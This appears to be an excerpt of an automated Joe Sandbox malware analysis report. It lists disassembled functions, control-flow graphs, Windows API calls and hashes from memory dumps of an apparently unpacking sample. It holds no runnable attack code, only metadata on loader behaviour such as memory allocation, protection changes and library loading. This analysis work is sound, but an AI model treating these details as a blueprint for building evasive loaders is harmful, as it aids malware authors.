                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                                                          Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 242 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                          Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                          • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                          Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                          • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                                          Function 00AE003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 ae003c-ae0047 1 ae004c-ae0263 call ae0a3f call ae0e0f call ae0d90 VirtualAlloc 0->1 2 ae0049 0->2 17 ae028b-ae0292 1->17 18 ae0265-ae0289 call ae0a69 1->18 2->1 20 ae02a1-ae02b0 17->20 22 ae02ce-ae03c2 VirtualProtect call ae0cce call ae0ce7 18->22 20->22 23 ae02b2-ae02cc 20->23 29 ae03d1-ae03e0 22->29 23->20 30 ae0439-ae04b8 VirtualFree 29->30 31 ae03e2-ae0437 call ae0ce7 29->31 32 ae04be-ae04cd 30->32 33 ae05f4-ae05fe 30->33 31->29 35 ae04d3-ae04dd 32->35 36 ae077f-ae0789 33->36 37 ae0604-ae060d 33->37 35->33 42 ae04e3-ae0505 LoadLibraryA 35->42 40 ae078b-ae07a3 36->40 41 ae07a6-ae07b0 36->41 37->36 43 ae0613-ae0637 37->43 40->41 44 ae086e-ae08be LoadLibraryA 41->44 45 ae07b6-ae07cb 41->45 46 ae0517-ae0520 42->46 47 ae0507-ae0515 42->47 48 ae063e-ae0648 43->48 52 ae08c7-ae08f9 44->52 49 ae07d2-ae07d5 45->49 50 ae0526-ae0547 46->50 47->50 48->36 51 ae064e-ae065a 48->51 53 ae07d7-ae07e0 49->53 54 ae0824-ae0833 49->54 55 ae054d-ae0550 50->55 51->36 56 ae0660-ae066a 51->56 57 ae08fb-ae0901 52->57 58 ae0902-ae091d 52->58 59 ae07e4-ae0822 53->59 60 ae07e2 53->60 64 ae0839-ae083c 54->64 61 ae0556-ae056b 55->61 62 ae05e0-ae05ef 55->62 63 ae067a-ae0689 56->63 57->58 59->49 60->54 65 ae056f-ae057a 61->65 66 ae056d 61->66 62->35 67 ae068f-ae06b2 63->67 68 ae0750-ae077a 63->68 64->44 69 ae083e-ae0847 64->69 71 ae057c-ae0599 65->71 72 ae059b-ae05bb 65->72 66->62 73 ae06ef-ae06fc 67->73 74 ae06b4-ae06ed 67->74 68->48 75 ae084b-ae086c 69->75 76 ae0849 69->76 83 ae05bd-ae05db 71->83 72->83 77 ae06fe-ae0748 73->77 78 ae074b 73->78 74->73 75->64 76->44 77->78 78->63 83->55
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00AE024D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction ID: e3268054eea07ba59a32516f66c61ea0f5b02ef71bdb6b0128b486beacee1036
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF526874A00269DFDB64CF69C984BA8BBB1BF09304F1480D9E94DAB351DB70AE85DF14
                                                                                                                                                                                                                                                                          Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID: ilmn
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                          • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                                                          Function 00BD9A86 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 129 bd9a86-bd9a9f 130 bd9aa1-bd9aa3 129->130 131 bd9aaa-bd9ab6 CreateToolhelp32Snapshot 130->131 132 bd9aa5 130->132 133 bd9ab8-bd9abe 131->133 134 bd9ac6-bd9ad3 Module32First 131->134 132->131 133->134 140 bd9ac0-bd9ac4 133->140 135 bd9adc-bd9ae4 134->135 136 bd9ad5-bd9ad6 call bd9745 134->136 141 bd9adb 136->141 140->130 140->134 141->135
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00BD9AAE
                                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00BD9ACE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BD9000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_bd9000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction ID: d2cc6a4012caa10632de3ba81dcc35d8cd28f5521baacf69bd72d060a3d5ac70
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0F6362007116FD7207BF59C8CB6EB6E8EF49720F1001AAE646911C0EB70EC054660
                                                                                                                                                                                                                                                                          Function 00AE0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 142 ae0e0f-ae0e24 SetErrorMode * 2 143 ae0e2b-ae0e2c 142->143 144 ae0e26 142->144 144->143
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00AE0223,?,?), ref: 00AE0E19
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00AE0223,?,?), ref: 00AE0E1E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction ID: 155e04ec968ad5c2af416ab200fdff24a25cec356725680222c81b7ef9aa53b1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D0123114512877D7002B95DC09BCD7B1CDF05B62F008421FB0DD9080C7B0994046E5
                                                                                                                                                                                                                                                                          Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 238 43ab91-43aba8 GetForegroundWindow call 43c7d0 241 43abad-43abce 238->241
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                          • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                          • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                                          Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 243 438e70-438e7c 244 438e83-438e8e call 43bf00 RtlFreeHeap 243->244 245 438e94-438e95 243->245 244->245
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                          • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                          • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                                          Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 248 438e47-438e4a 249 438e51-438e55 RtlAllocateHeap 248->249
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                          • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                          Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 250 438e51-438e55 RtlAllocateHeap
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                          • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                          Function 00BD9745 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00BD9796
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BD9000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_bd9000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                          • Instruction ID: 0136232ea0bd800b56928e892678f50787114df7a4b16685d932a71e461c233e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3112B79A00208EFDB01DF98C985E98BBF5AF08750F058095F9489B362D371EA50DF80

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                          • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                          • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                                          • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                          Function 00B03C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: 209f946d11be42c98d961b3d0525baeb6e7168c7d36b0012abed9deaa24f1eea
